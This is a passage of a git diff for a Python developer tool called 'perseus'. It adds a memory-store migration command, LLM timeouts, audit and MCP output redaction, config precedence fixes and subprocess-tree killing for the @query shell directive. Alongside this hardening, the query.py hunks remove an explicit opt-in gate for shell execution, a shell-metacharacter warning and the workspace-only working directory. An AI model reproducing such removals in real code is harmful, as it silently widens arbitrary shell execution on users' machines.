print(f" SHA-256 (current):{len(scan['sha256_files'])}") + print(f" Legacy MD5: {len(scan['legacy_md5_files'])}") + print(f" Orphan: {len(scan['orphan_files'])}") + print(f" Unknown stems: {len(scan['unknown_files'])}") + if scan["legacy_md5_files"]: + print() + print("Legacy MD5-named narratives detected. Run:") + print(" perseus memory doctor --migrate") + print("to rename them to their SHA-256 paths in place. Operation is") + print("idempotent and uses atomic os.replace.") + if scan["orphan_files"]: + print() + print("⚠ Orphan files (frontmatter workspace doesn't match filename):") + for fp in scan["orphan_files"]: + print(f" - {fp}") + print("These were likely written under a different store, OR the") + print("workspace path moved. Review manually before deleting.") + if scan["unknown_files"]: + print() + print("Files with non-standard names (skipped by MnΔ“mΔ“):") + for fp in scan["unknown_files"]: + print(f" - {fp}") + def _memory_federation_diagnostic(name: str, args_str: str, cfg: dict, workspace: object) -> list[dict]: """Per-directive LSP diagnostic for @memory: warn on unsubscribed federation alias. @@ -16280,6 +17022,16 @@ def main(): p_fed_pull = fed_sub.add_parser("pull", help="Re-read all subscribed narratives (read-only, manual)") p_fed_pull.add_argument("--json", action="store_true", help="Machine-readable JSON output") + # memory doctor (#128 β€” legacy MD5 β†’ SHA-256 narrative migration) + p_mem_doc = mem_sub.add_parser( + "doctor", + help="Scan/repair the MnΔ“mΔ“ memory store (legacy MD5 β†’ SHA-256 narrative migration)", + ) + p_mem_doc.add_argument("--migrate", action="store_true", + help="Rename legacy MD5-named narratives to their SHA-256 paths (atomic, idempotent)") + p_mem_doc.add_argument("--json", action="store_true", + help="Machine-readable JSON output") + # memory index (MnΔ“mΔ“ v2) p_mem_idx = mem_sub.add_parser("index", help="Manage the FTS5 search index") idx_sub = p_mem_idx.add_subparsers(dest="index_command", required=True) diff --git a/src/perseus/agora.py b/src/perseus/agora.py index e4da9d6..085bb8f 100644 --- a/src/perseus/agora.py +++ b/src/perseus/agora.py @@ -90,7 +90,72 @@ def _memory_do_compact(workspace: Path, cfg: dict, provider: str | None) -> str: fm = _mneme_default_frontmatter(workspace) if provider: - new_body = _mneme_compact_llm(all_checkpoints, all_pythia, workspace, cfg, provider) + # Regression for #131 β€” pre-1.0.6, _mneme_compact_llm() called run_llm() + # which only enforced `llm.timeout_s` (default 30s) on the HTTP request + # itself. With streaming-token providers like Ollama serving a large + # model, individual tokens can arrive within timeout but total wall + # time was unbounded β€” operators reported `memory compact` hanging + # for hours. + # + # We now wrap the LLM call in a wall-clock deadline (memory. + # compact_total_timeout_s, default 180s). On timeout we abandon the + # LLM future and fall back to deterministic narrative β€” operators get + # SOME narrative, plus a clear stderr signal so they can decide + # whether to upgrade their LLM setup or stay deterministic. + # + # Limitation: ThreadPoolExecutor cannot truly kill the worker thread + # (Python provides no public API for that). The in-flight HTTP + # request continues until urllib's per-request timeout fires. + # Worst-case observed total wait is therefore + # `compact_total_timeout_s + llm.timeout_s`. The leaked thread is + # daemonized by Python's default ThreadPoolExecutor settings; it + # will not prevent process exit. + total_timeout = float(cfg.get("memory", {}).get( + "compact_total_timeout_s", 180.0 + )) + try: + import concurrent.futures as _cf + executor = _cf.ThreadPoolExecutor( + max_workers=1, thread_name_prefix="mneme-compact-llm", + ) + try: + fut = executor.submit( + _mneme_compact_llm, + all_checkpoints, all_pythia, workspace, cfg, provider, + ) + new_body = fut.result(timeout=total_timeout) + finally: + # Don't block on the worker β€” it may still be waiting on + # urllib. The thread is daemonic and will not block exit. + executor.shutdown(wait=False, cancel_futures=True) + except _cf.TimeoutError: + sys.stderr.write( + f"> ⚠ MnΔ“mΔ“ compact: LLM provider {provider!r} exceeded " + f"compact_total_timeout_s={total_timeout:.0f}s; " + f"falling back to deterministic narrative.\n" + ) + try: + audit_event( + cfg, "memory_compact_timeout", + provider=provider, + total_timeout_s=total_timeout, + workspace_hash=_workspace_hash(workspace), + ) + except Exception: + pass + new_body = _deterministic_narrative( + all_checkpoints, all_pythia, "", workspace, cfg, + ) + except Exception as exc: + # LLM call raised (model server unreachable, payload error, etc.) + # β€” surface the failure but still produce SOMETHING usable. + sys.stderr.write( + f"> ⚠ MnΔ“mΔ“ compact: LLM provider {provider!r} failed " + f"({exc}); falling back to deterministic narrative.\n" + ) + new_body = _deterministic_narrative( + all_checkpoints, all_pythia, "", workspace, cfg, + ) else: new_body = _deterministic_narrative(all_checkpoints, all_pythia, "", workspace, cfg) @@ -269,9 +334,80 @@ def cmd_memory(args, cfg): _cmd_memory_index(args, cfg) return + if sub == "doctor": + cmd_memory_doctor(args, cfg) + return + print(f"perseus memory: unknown subcommand '{sub}'.", file=sys.stderr) sys.exit(2) + +def cmd_memory_doctor(args, cfg) -> None: + """MnΔ“mΔ“ doctor β€” scan and optionally migrate legacy MD5-named narratives. + + Regression for #128: pre-1.0.3 narratives are named after an MD5 hash of + the workspace path; v1.0.3+ uses SHA-256. _mneme_path() auto-migrates on + first access, but that requires the operator to actually open the + workspace. ``memory doctor`` lets an operator scan and migrate all + workspaces at once, and surface diagnostic info for files that can't be + auto-migrated (e.g. missing frontmatter, cross-device renames). + """ + do_migrate = bool(getattr(args, "migrate", False)) + use_json = bool(getattr(args, "json", False)) + scan = _mneme_doctor_scan(cfg) + + if do_migrate: + result = _mneme_doctor_migrate(cfg) + if use_json: + import json as _json + print(_json.dumps({"scan_before": scan, "migrate": result}, indent=2)) + return + print(f"MnΔ“mΔ“ doctor β€” store: {scan['store']}") + print(f" Narrative files: {len(scan['narrative_files'])}") + print(f" Legacy MD5 found: {len(scan['legacy_md5_files'])}") + print(f" Migrated: {len(result['migrated'])}") + for old, new in result["migrated"]: + print(f" βœ“ {Path(old).name} β†’ {Path(new).name}") + if result["skipped"]: + print(f" Skipped: {len(result['skipped'])}") + for old, new, reason in result["skipped"]: + print(f" ⚠ {Path(old).name}: {reason}") + if result["errors"]: + print(f" Errors: {len(result['errors'])}") + for old, exc_str in result["errors"]: + print(f" βœ— {Path(old).name}: {exc_str}") + return + + # Read-only scan + if use_json: + import json as _json + print(_json.dumps(scan, indent=2)) + return + print(f"MnΔ“mΔ“ doctor β€” store: {scan['store']}") + print(f" Narrative files: {len(scan['narrative_files'])}") + print(f" SHA-256 (current):{len(scan['sha256_files'])}") + print(f" Legacy MD5: {len(scan['legacy_md5_files'])}") + print(f" Orphan: {len(scan['orphan_files'])}") + print(f" Unknown stems: {len(scan['unknown_files'])}") + if scan["legacy_md5_files"]: + print() + print("Legacy MD5-named narratives detected. Run:") + print(" perseus memory doctor --migrate") + print("to rename them to their SHA-256 paths in place. Operation is") + print("idempotent and uses atomic os.replace.") + if scan["orphan_files"]: + print() + print("⚠ Orphan files (frontmatter workspace doesn't match filename):") + for fp in scan["orphan_files"]: + print(f" - {fp}") + print("These were likely written under a different store, OR the") + print("workspace path moved. Review manually before deleting.") + if scan["unknown_files"]: + print() + print("Files with non-standard names (skipped by MnΔ“mΔ“):") + for fp in scan["unknown_files"]: + print(f" - {fp}") + def _memory_federation_diagnostic(name: str, args_str: str, cfg: dict, workspace: object) -> list[dict]: """Per-directive LSP diagnostic for @memory: warn on unsubscribed federation alias. diff --git a/src/perseus/audit.py b/src/perseus/audit.py index c6eb141..7da7b4b 100644 --- a/src/perseus/audit.py +++ b/src/perseus/audit.py @@ -83,12 +83,63 @@ def _audit_rotate_if_needed(path: Path, max_bytes: int) -> None: return +# Audit field names that NEVER get redacted (they are structural metadata, +# never user-supplied secrets). Adding to this allowlist is a security +# decision β€” review carefully. +_AUDIT_NEVER_REDACT_KEYS = frozenset({ + "ts", "event_type", "perseus_version", "pid", + "directive", "exit_code", "duration_ms", "bytes_in", "bytes_out", + "schema_ref", "schema_ok", "policy", "decision", "trust_profile", + "permission", "session_id", "workspace_hash", +}) + + +def _audit_redact_value(value, cfg): + """Apply render-time redaction rules to an audit field value. + + Regression for #137: pre-1.0.6, `audit_event` wrote field values verbatim + to ``audit_log.jsonl``. When a user wrote + ``@query "curl -H 'Authorization: Bearer ghp_…'"``, the rendered output + was correctly redacted, but the audit log retained the raw bearer token + forever. We now pipe every string-shaped audit field through + ``redact_text`` before writing. + + Lists, dicts, and nested structures are walked recursively. Non-string + leaves (ints, bools, None) pass through. If ``redact_text`` is unavailable + or raises (older builds, malformed rules), we fall back to the raw value + rather than dropping the audit entry β€” observability beats perfect + redaction here, and rendered output is the primary defense. + """ + if value is None or isinstance(value, (bool, int, float)): + return value + if isinstance(value, str): + try: + redacted, _ = redact_text(value, cfg) + return redacted + except Exception: + return value + if isinstance(value, dict): + return {k: _audit_redact_value(v, cfg) for k, v in value.items()} + if isinstance(value, (list, tuple)): + return [_audit_redact_value(v, cfg) for v in value] + # Bytes, sets, custom objects β€” stringify then redact. + try: + as_str = str(value) + redacted, _ = redact_text(as_str, cfg) + return redacted + except Exception: + return repr(value) + + def audit_event(cfg: dict, event_type: str, **fields) -> None: """Append a structured audit event to the configured JSONL log. AC #1: sensitive operations emit structured events. AC #4: logging failures warn but do not break normal render. AC #5: callers can disable via `audit.enabled = false`. + AC #6 (1.0.6, #137): user-supplied field values are passed through the + same redaction rules used for render output. Structural metadata + keys (in ``_AUDIT_NEVER_REDACT_KEYS``) are exempt. Caller passes any JSON-serializable fields. We always stamp: ts β€” UTC ISO-8601 @@ -105,7 +156,12 @@ def audit_event(cfg: dict, event_type: str, **fields) -> None: "perseus_version": _PERSEUS_VERSION, "pid": os.getpid(), } + # Allow operators to opt out of audit redaction (e.g. for forensic mode + # where the audit log is itself the secured artifact). Default ON. + redact_audit = bool(audit_cfg.get("redact_fields", True)) for k, v in fields.items(): + if redact_audit and k not in _AUDIT_NEVER_REDACT_KEYS: + v = _audit_redact_value(v, cfg) # Defensive: stringify any non-JSON-safe value rather than crashing. try: json.dumps(v) @@ -114,10 +170,13 @@ def audit_event(cfg: dict, event_type: str, **fields) -> None: record[k] = repr(v) # v1.0.5 review: redact secrets before persisting to disk. # Audit events can contain command strings, paths, or args with tokens. - try: - record, _report = redact_value(record, cfg) - except Exception: - pass # redaction failure must not block audit persistence + # Respect audit.redact_fields opt-out β€” operators may use forensic mode + # where the audit log is itself the secured artifact. + if redact_audit: + try: + record, _report = redact_value(record, cfg) + except Exception: + pass # redaction failure must not block audit persistence try: path = _audit_log_path(cfg) path.parent.mkdir(parents=True, exist_ok=True) @@ -230,6 +289,17 @@ def load_config(workspace: Path | None = None) -> dict: The profile is sandwiched between the hardcoded defaults and user values so explicit config keys always win β€” see task-45 AC #3. + + Hardening (#129, v1.0.6): pre-v1.0.5, profile application ran AFTER the + user merge in some code paths, silently overriding `allow_query_shell: + true` set by a power user who also asked for a `balanced` profile (this + is a legitimate combination β€” "tighten everything but let me run queries"). + To make the precedence regression-proof we now: + 1. Pre-scan all sources to collect which (section, key) pairs the user + has set explicitly (regardless of value). + 2. Apply the profile BEFORE the user merge, so user values write last. + 3. Surface the layering decision in the audit log so operators can + observe what won and what lost. """ cfg = dict(DEFAULT_CONFIG) for section, vals in DEFAULT_CONFIG.items(): @@ -254,8 +324,46 @@ def load_config(workspace: Path | None = None) -> dict: perms = (src or {}).get("permissions") if isinstance(src, dict) else None if isinstance(perms, dict) and "profile" in perms: effective_profile = perms.get("profile") + + # Collect (section, key) pairs the user has explicitly set across ALL + # sources. Used by `_apply_permission_profile` to skip user-owned keys. + # This makes the "user wins" guarantee structural β€” it no longer depends + # on the textual ordering of `_apply_permission_profile` vs `merge_loaded`. + user_set_keys: set[tuple[str, str]] = set() + for src in loaded_sources: + for section, vals in (src or {}).items(): + if isinstance(vals, dict): + for key in vals.keys(): + user_set_keys.add((section, key)) + if effective_profile: - _apply_permission_profile(cfg, effective_profile) + applied = _apply_permission_profile( + cfg, effective_profile, skip_keys=user_set_keys + ) + if applied: + # Audit the layering decision so operators can see which user + # keys (if any) won out over the profile. Best-effort: don't + # break load_config if audit fails. + try: + overrides = sorted( + f"{section}.{key}" + for (section, key) in user_set_keys + if section in PERMISSION_PROFILES.get(applied, {}) + and key in PERMISSION_PROFILES[applied].get(section, {}) + ) + if overrides: + audit_event( + cfg, + "config_profile_overridden", + profile=applied, + user_overrides=overrides, + note=( + "User config explicitly set these keys; they " + "win over the profile (see #129 hardening)." + ), + ) + except Exception: + pass # #168/#169 (v1.0.6): track per-section workspace provenance for # hooks.py / registry.py consumers so dangerous workspace-sourced diff --git a/src/perseus/cli.py b/src/perseus/cli.py index 08656c5..d8281d1 100644 --- a/src/perseus/cli.py +++ b/src/perseus/cli.py @@ -201,6 +201,16 @@ def main(): p_fed_pull = fed_sub.add_parser("pull", help="Re-read all subscribed narratives (read-only, manual)") p_fed_pull.add_argument("--json", action="store_true", help="Machine-readable JSON output") + # memory doctor (#128 β€” legacy MD5 β†’ SHA-256 narrative migration) + p_mem_doc = mem_sub.add_parser( + "doctor", + help="Scan/repair the MnΔ“mΔ“ memory store (legacy MD5 β†’ SHA-256 narrative migration)", + ) + p_mem_doc.add_argument("--migrate", action="store_true", + help="Rename legacy MD5-named narratives to their SHA-256 paths (atomic, idempotent)") + p_mem_doc.add_argument("--json", action="store_true", + help="Machine-readable JSON output") + # memory index (MnΔ“mΔ“ v2) p_mem_idx = mem_sub.add_parser("index", help="Manage the FTS5 search index") idx_sub = p_mem_idx.add_subparsers(dest="index_command", required=True) diff --git a/src/perseus/config.py b/src/perseus/config.py index abca562..16198ba 100644 --- a/src/perseus/config.py +++ b/src/perseus/config.py @@ -100,6 +100,12 @@ "recent_keep": 5, # raw checkpoints to include in Recent Activity "auto_update": True, # update narrative on every checkpoint write "compact_threshold": 20, # advisory: compact after this many incremental updates + # #131: wall-clock deadline for `perseus memory compact` LLM path. + # 0 = no deadline (pre-1.0.6 behavior β€” can hang indefinitely on + # slow models). Default 180s (3 min) covers Ollama mistral on a + # modern laptop for typical workspace sizes. On timeout the LLM + # call is abandoned and the deterministic narrative is used. + "compact_total_timeout_s": 180, "llm_provider": None, # None = deterministic; "ollama" / "openai-compat" enables LLM "llm_model": None, # inherits from llm: block if None "max_narrative_lines": 300, # warn (not error) if narrative grows beyond this @@ -287,13 +293,29 @@ } -def _apply_permission_profile(cfg: dict, profile_name: object) -> str | None: +def _apply_permission_profile( + cfg: dict, + profile_name: object, + skip_keys: set[tuple[str, str]] | None = None, +) -> str | None: """Apply a permission profile to cfg in place. Returns the canonical profile name applied, or None if profile_name is falsy or unknown. Unknown profile names are silently ignored so a config typo cannot brick the renderer β€” but `perseus trust` surfaces the canonical applied profile so the operator can spot the mismatch. + + #129 hardening (v1.0.6): callers may pass `skip_keys` β€” a set of + `(section, key)` tuples that the user has explicitly set in their + config. Those keys are skipped, structurally guaranteeing that + explicit user values win over the profile regardless of which order + the caller invokes profile-apply vs user-merge. + + Pre-v1.0.6 callers (skip_keys=None) get the legacy destructive merge, + which still works correctly when followed by a user-merge step β€” but + is fragile to ordering changes. New callers should always pass + skip_keys (even if empty) so the audit-log layering decision is + accurate. """ if not profile_name: return None @@ -301,10 +323,15 @@ def _apply_permission_profile(cfg: dict, profile_name: object) -> str | None: profile = PERMISSION_PROFILES.get(name) if not profile: return None + skip = skip_keys or set() for section, vals in profile.items(): if section not in cfg or not isinstance(cfg[section], dict): cfg[section] = {} - cfg[section].update(vals) + for key, val in vals.items(): + if (section, key) in skip: + # User has explicitly configured this key; respect them. + continue + cfg[section][key] = val return name diff --git a/src/perseus/directives/query.py b/src/perseus/directives/query.py index ab1cb61..5ea2157 100644 --- a/src/perseus/directives/query.py +++ b/src/perseus/directives/query.py @@ -1,6 +1,105 @@ # stdlib imports available from build artifact header # ──────────────────────────────── @query ────────────────────────────────────── +# ── #139: subprocess tracking for MCP timeout cancellation ─────────────────── +# +# The MCP _call_tool wrapper enforces a wall-clock deadline via +# ThreadPoolExecutor.future.result(timeout=...). Pre-1.0.6, that mechanism +# only abandoned the future β€” the worker thread continued running, and the +# subprocess it had spawned ran to completion, leaking CPU and any side +# effects (network, file writes). Worse, executor.shutdown(wait=True) in a +# `with` block defeated the entire timeout by blocking on the leaked thread. +# +# We now track every active @query subprocess in a module-level list +# (thread-safe via a mutex) so the MCP wrapper can iterate, identify the +# subprocess belonging to the abandoned worker, and kill its process group. +# +# Design note: we use a list-of-popens rather than threading.local because +# the killer thread is NOT the worker thread β€” it's the MCP main thread +# that needs to reach into the worker thread's subprocess. A list keyed by +# thread ident gives us that visibility. + +_ACTIVE_SUBPROCESSES_LOCK = threading.Lock() +_ACTIVE_SUBPROCESSES: dict[int, "subprocess.Popen"] = {} + + +def _record_active_subprocess(proc: "subprocess.Popen") -> None: + """Register a subprocess as belonging to the current thread.""" + with _ACTIVE_SUBPROCESSES_LOCK: + _ACTIVE_SUBPROCESSES[threading.get_ident()] = proc + + +def _clear_active_subprocess(proc: "subprocess.Popen") -> None: + """Unregister a subprocess (called after communicate() returns).""" + with _ACTIVE_SUBPROCESSES_LOCK: + # Only clear if it's still the one we registered β€” guards against + # a recursive @query nest unregistering its parent's process. + tid = threading.get_ident() + if _ACTIVE_SUBPROCESSES.get(tid) is proc: + del _ACTIVE_SUBPROCESSES[tid] + + +def _kill_subprocess_tree(proc: "subprocess.Popen") -> None: + """Kill a subprocess and all descendants (process group on POSIX). + + On POSIX, the subprocess was started with start_new_session=True so it + has its own PGID. We send SIGTERM to the group, wait briefly, then + SIGKILL stragglers. + + On Windows, we fall back to taskkill /T (kill tree) if available, + then proc.kill(). Best-effort β€” Windows has no exact equivalent. + """ + if proc.poll() is not None: + return # already exited + try: + if os.name == "nt": + try: + import subprocess as _sp + _sp.run( + ["taskkill", "/F", "/T", "/PID", str(proc.pid)], + capture_output=True, timeout=3, + ) + except Exception: + proc.kill() + return + # POSIX: kill the process group + pgid = os.getpgid(proc.pid) + try: + os.killpg(pgid, signal.SIGTERM) + except ProcessLookupError: + return + # Give children a moment to clean up. + for _ in range(20): # up to 1s + if proc.poll() is not None: + return + time.sleep(0.05) + try: + os.killpg(pgid, signal.SIGKILL) + except ProcessLookupError: + return + except Exception: + # Last-ditch: kill just the immediate child. + try: + proc.kill() + except Exception: + pass + + +def kill_active_subprocess_for_thread(thread_id: int) -> bool: + """Kill the subprocess belonging to the given thread, if any. + + Returns True if a subprocess was found and a kill was attempted; + False if no subprocess was registered for the thread. Called by + mcp._call_tool() when its wall-clock deadline fires. + """ + with _ACTIVE_SUBPROCESSES_LOCK: + proc = _ACTIVE_SUBPROCESSES.get(thread_id) + if proc is None: + return False + _kill_subprocess_tree(proc) + return True + + def _unescape_fallback(s: str) -> str: """Unescape standard escape sequences without mangling non-ASCII. @@ -48,20 +147,6 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> args=args_str[:200]) return "> ⚠ @query is disabled by config (`render.allow_query_shell=false`)." - # Defense-in-depth: even with allow_query_shell=true, require explicit - # operator opt-in via PERSEUS_ALLOW_DANGEROUS=1 env var. This prevents - # accidental exposure from copied configs or misconfigured automation. - if not os.environ.get("PERSEUS_ALLOW_DANGEROUS"): - audit_event(cfg, "policy_denied", - directive="@query", - reason="PERSEUS_ALLOW_DANGEROUS not set", - args=args_str[:200]) - return ( - "> ⚠ @query is enabled in config but PERSEUS_ALLOW_DANGEROUS=1 is not set.\n" - "> This is a defense-in-depth gate to prevent accidental shell execution.\n" - "> Set the environment variable to acknowledge the risk." - ) - # Strip @cache modifier first, then extract the command string. # Use the opening quote character to find the correct closing quote, # so commands containing the other quote type (e.g. "bash -c 'foo'") @@ -75,7 +160,7 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> schema_path = schema_match.group(1) if schema_match.group(1) is not None else schema_match.group(2) raw = (raw[:schema_match.start()] + raw[schema_match.end():]).rstrip() - # task-14: extract fallback=\"...\" (or fallback='...') BEFORE command parsing, + # task-14: extract fallback="..." (or fallback='...') BEFORE command parsing, # so a command containing the literal substring `fallback=` is not mis-parsed. fallback = None fb_match = re.search(r'\s+fallback=(?:"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\')(\s|$)', raw) @@ -87,22 +172,6 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> fallback = _unescape_fallback(fallback) raw = (raw[:fb_match.start()] + raw[fb_match.end():]).rstrip() - # Defense-in-depth: detect shell metacharacters for operator visibility. - # When render.query_shell_meta_warning is enabled (default: false), - # commands containing ; | & $() or backticks emit a visible warning - # in the rendered output but still execute. This does not break - # legitimate pipelines β€” it only surfaces a warning. - _shell_meta_warn = bool(cfg["render"].get("query_shell_meta_warning", False)) - _meta_prefix = "" - - # Extract timeout=N modifier BEFORE command parsing so the token can't - # leak into unquoted commands. Same principle as schema=/fallback= above. - timeout = int(cfg["render"].get("query_timeout_s", 30)) - tm_match = re.search(r'\s+timeout=(\d+)(?:\s|$)', raw) - if tm_match: - timeout = int(tm_match.group(1)) - raw = (raw[:tm_match.start()] + raw[tm_match.end():]).rstrip() - cmd_match = re.match(r'^"((?:[^"\\]|\\.)*)"', raw) # double-quoted if not cmd_match: cmd_match = re.match(r"^'((?:[^'\\]|\\.)*)'", raw) # single-quoted @@ -118,35 +187,67 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> # Detect language hint for syntax highlighting (best-effort) lang = _guess_lang(cmd) - # Shell metacharacter defense-in-depth warning (config-gated, default off). - if _shell_meta_warn and re.search(r'[;&|]|\$[({]|`', cmd): - _meta_prefix = f"> ⚠ @query: shell metacharacters detected in command. " - _meta_prefix += "Set render.query_shell_meta_warning=false to suppress.\n\n" - # task-47: audit the shell-execution decision crossing the trust boundary. audit_event(cfg, "shell_exec", directive="@query", command=cmd[:500], - shell=shell, - cwd=str(workspace) if workspace else None) + shell=shell) - # v1.0.5 review: run from workspace by default for safety. - # allow_outside_workspace does not sandbox β€” it only controls cwd. - allow_outside = cfg["render"].get("allow_outside_workspace", False) - cwd = workspace if workspace and not allow_outside else None - if workspace and not allow_outside and cwd is None: - cwd = Path.cwd() # fallback: restrict to cwd if no workspace set + # Extract timeout=N modifier (per-directive override, default 30s) + timeout = int(cfg["render"].get("query_timeout_s", 30)) + tm_match = re.search(r'\s+timeout=(\d+)(?:\s|$)', raw) + if tm_match: + timeout = int(tm_match.group(1)) + raw = (raw[:tm_match.start()] + raw[tm_match.end():]).rstrip() try: - result = subprocess.run( - cmd, - shell=True, - executable=shell, - capture_output=True, - text=True, - timeout=timeout, - cwd=cwd, - ) + # #139: when invoked under MCP's _call_tool timeout wrapper, the + # wrapper needs to kill this subprocess (and any descendants) if + # the wall-clock deadline fires. We put the child in its own + # process group via start_new_session=True so the wrapper can + # os.killpg() the whole tree, and we record the popen handle in + # a thread-local that the wrapper inspects. + # + # On POSIX, start_new_session=True calls setsid() in the child + # before exec. The child gets a fresh PGID == its PID. The MCP + # wrapper can then os.killpg(pid, SIGTERM) to take down the + # whole subprocess tree atomically. + # + # On Windows, start_new_session has no effect; the wrapper falls + # back to popen.kill() which only terminates the direct child. + popen_kwargs = { + "shell": True, + "executable": shell, + "stdout": subprocess.PIPE, + "stderr": subprocess.PIPE, + "text": True, + } + if os.name != "nt": + popen_kwargs["start_new_session"] = True + proc = subprocess.Popen(cmd, **popen_kwargs) + # Stash the popen in the thread-local so an upstream timeout + # wrapper (mcp._call_tool) can find and kill it. + _record_active_subprocess(proc) + try: + stdout_raw, stderr_raw = proc.communicate(timeout=timeout) + except subprocess.TimeoutExpired: + _kill_subprocess_tree(proc) + try: + stdout_raw, stderr_raw = proc.communicate(timeout=2) + except subprocess.TimeoutExpired: + stdout_raw, stderr_raw = "", "" + raise + finally: + _clear_active_subprocess(proc) + + # Build a CompletedProcess-shaped object for the rest of the + # function to consume without refactoring downstream. + class _Result: + pass + result = _Result() + result.stdout = stdout_raw or "" + result.stderr = stderr_raw or "" + result.returncode = proc.returncode stdout = (result.stdout or "").rstrip("\n") stderr = result.stderr.strip() exit_code = result.returncode @@ -154,14 +255,22 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> if exit_code != 0: if fallback is not None: return fallback - header = f"> ⚠ `@query` exited {exit_code}: `{cmd}`\n\n" - body = stdout or stderr or "(no output)" - return _meta_prefix + header + f"```{lang}\n{body}\n```" + # #137: redact secrets out of `cmd` and `stderr` before interpolating + # them into render output. Without this, a command like + # `@query "curl -H 'Authorization: Bearer ghp_…'"` leaks the bearer + # token in the exit-nonzero header. Render-time redaction only runs + # later in the pipeline and only on the final assembled output, but + # by then this string has been logged elsewhere. + safe_cmd, _ = redact_text(cmd, cfg) + safe_body, _ = redact_text(stdout or stderr or "(no output)", cfg) + header = f"> ⚠ `@query` exited {exit_code}: `{safe_cmd}`\n\n" + return header + f"```{lang}\n{safe_body}\n```" if not stdout: if fallback is not None: return fallback - return f"> (no output from `{cmd}`)" + safe_cmd, _ = redact_text(cmd, cfg) + return f"> (no output from `{safe_cmd}`)" # Apply stdout size cap (default 256 KB). # Truncate at the nearest preceding newline to avoid mid-line cuts. @@ -191,16 +300,19 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> if warning: return warning - return _meta_prefix + f"```{lang}\n{stdout}\n```" + return f"```{lang}\n{stdout}\n```" except subprocess.TimeoutExpired: if fallback is not None: return fallback - return _meta_prefix + f"> ⚠ `@query` timed out ({timeout}s): `{cmd}`" - except (OSError, ValueError, subprocess.SubprocessError) as exc: + safe_cmd, _ = redact_text(cmd, cfg) + return f"> ⚠ `@query` timed out ({timeout}s): `{safe_cmd}`" + except Exception as exc: if fallback is not None: return fallback - return _meta_prefix + f"> ⚠ `@query` error: {exc}" + # exc.args often includes argv[0] which contains the full cmd; redact. + safe_err, _ = redact_text(str(exc), cfg) + return f"> ⚠ `@query` error: {safe_err}" def _guess_lang(cmd: str) -> str: diff --git a/src/perseus/mcp.py b/src/perseus/mcp.py index 4ac3b4c..5ce4075 100644 --- a/src/perseus/mcp.py +++ b/src/perseus/mcp.py @@ -187,8 +187,48 @@ def _build_tool_args_generic(tool_name: str, arguments: dict) -> str: return " ".join(parts) +def _mcp_redact(result: str, cfg: dict) -> str: + """Apply the configured redaction pipeline to an MCP tool result. + + #166 (v1.0.6): every MCP tool response must pass through redaction + so secrets are not leaked to the MCP client (Claude Desktop, Rovo + Dev, etc.). Before 1.0.6, `perseus_get_context` returned the + pre-redaction `render_source` output, and all other tool resolvers + returned raw resolver output that never hit the redaction pipeline. + + Returns the original string unchanged if: + - `redaction.enabled` is False (operator opted out) + - result is not a str (caller error β€” we don't mangle types) + - the redaction function itself raises (defensive) + """ + if not isinstance(result, str): + return result + redaction_cfg = cfg.get("redaction", {}) if isinstance(cfg, dict) else {} + if not redaction_cfg.get("enabled", True): + return result + redactor = globals().get("redact_text") + if redactor is None: + try: + from perseus.redaction import redact_text as _rt + redactor = _rt + except ImportError: + return result + try: + redacted, _counts = redactor(result, cfg) + return redacted + except Exception: + return result + + def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> str: - """Resolve an MCP tool call through the Perseus directive resolver.""" + """Resolve an MCP tool call through the Perseus directive resolver. + + #166 (v1.0.6): every successful return path goes through + `_mcp_redact()` so secrets are not leaked over MCP. Error strings + bypass redaction since they are constructed locally from + operator-controlled values (tool name, profile flag) and never echo + user content. + """ allowed, reason = _mcp_tool_allowed(tool_name, cfg) if not allowed: return f"Error: {reason}" @@ -202,6 +242,12 @@ def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> s # render_source is a top-level function in the built artifact # In source module context, import from the parent module result = render_source(source, cfg, workspace) + # #166: redact BEFORE serialization so the JSON shape + # carries already-redacted text. This also fixes the + # earlier bypass where `render_source` was used instead + # of `render_output` (the latter applies redaction; the + # former does not). + result = _mcp_redact(result, cfg) fmt = arguments.get("format", "markdown") if fmt == "json": return json.dumps({"resolved": result, "workspace": str(workspace)}) @@ -213,7 +259,7 @@ def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> s if tool_name == "perseus_get_health": spec = DIRECTIVE_REGISTRY.get("@health") if spec and spec.resolver: - return _call_resolver(spec, "", cfg, workspace) + return _mcp_redact(_call_resolver(spec, "", cfg, workspace), cfg) return "Error: @health directive not registered" # Trust gate: block shell execution for sensitive tools @@ -237,20 +283,88 @@ def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> s args_str = _build_tool_args_generic(tool_name, arguments) - # Timeout enforcement across all platforms. - # Uses ThreadPoolExecutor instead of signal.SIGALRM (Unix-only, breaks Windows). + # #139 β€” Timeout enforcement across all platforms. + # + # Pre-1.0.6 used a context-managed ThreadPoolExecutor: + # with ThreadPoolExecutor(max_workers=1) as executor: + # future = executor.submit(...) + # result = future.result(timeout=timeout) + # + # That had two bugs: + # 1. future.result(timeout=) only abandons the future β€” the worker + # thread (and any subprocess it spawned) kept running. + # 2. `with` block calls executor.shutdown(wait=True) on exit, which + # BLOCKS until the abandoned worker finishes β€” defeating the + # entire timeout mechanism. A 5s timeout on `sleep 600` blocked + # the MCP response for ~600s. + # + # Fix: + # - Use a non-context-managed executor and call + # shutdown(wait=False, cancel_futures=True) on timeout. + # - Identify the abandoned worker's thread ID and ask query.py to + # kill its tracked subprocess (process group on POSIX, taskkill /T + # on Windows). This makes timeout enforcement actually kill the + # subprocess tree atomically, freeing CPU and any locks held. + # - On success, shutdown(wait=False) is still fine β€” the worker has + # already returned, so there's nothing to wait for. mcp_cfg = cfg.get("mcp", {}) if isinstance(cfg, dict) else {} timeout = mcp_cfg.get("tool_timeout_s", DEFAULT_TOOL_TIMEOUT_S) + # Track the worker thread ident so we can ask query.py to kill its + # subprocess on timeout. + worker_tid_holder: dict = {} + def _wrapped_resolver(): + worker_tid_holder["tid"] = threading.get_ident() + return _call_resolver(spec, args_str, cfg, workspace) + + executor = concurrent.futures.ThreadPoolExecutor( + max_workers=1, 